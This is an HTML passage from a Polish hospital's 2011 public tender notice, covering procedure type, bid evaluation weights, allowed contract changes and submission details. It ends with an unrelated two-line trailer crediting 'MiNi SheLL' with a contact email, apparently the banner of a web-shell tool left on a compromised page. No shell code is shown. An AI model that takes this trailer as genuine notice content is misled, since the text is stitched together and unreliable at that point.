<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Rozwiązania architektoniczno - urbanistyczne - 20</li>
<li>3 - Funkcjonalność zaproponowanych rozwiązań - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Wszelkie zmiany i uzupełnienia do niniejszej umowy mogą być dokonane za zgodą obu stron  wyrażoną na piśmie pod rygorem nieważności.
2.  Strony dopuszczają możliwość zmian umowy w następujących przypadkach:
2.1	Zmiana Stron umowy.
2.2  Zmiana banków lub numerów kont bankowych Stron.
2.3  Zmiana stawek podatku VAT.
3. Zmniejszenie wartości umowy wynikające z robót niewykonanych lub zmiana zakresu rzeczowego (nie zwiększająca ogólnej wartości umowy)
4. Zmiana przedstawicielstwa umawiających się stron wyszczególnionych w § 5 niniejszej umowy, oraz zmiana kierownika budowy wykazanego w § 7 niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mssw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Międzyleski Szpital Specjalistyczny w Warszawie
Dział Zamówień Publicznych 
ul. Bursztynowa 2
04-749 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2011 godzina 12:00, miejsce: Kancelaria Międzyleskiego Szpitala Specjalistycznego w Warszawie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com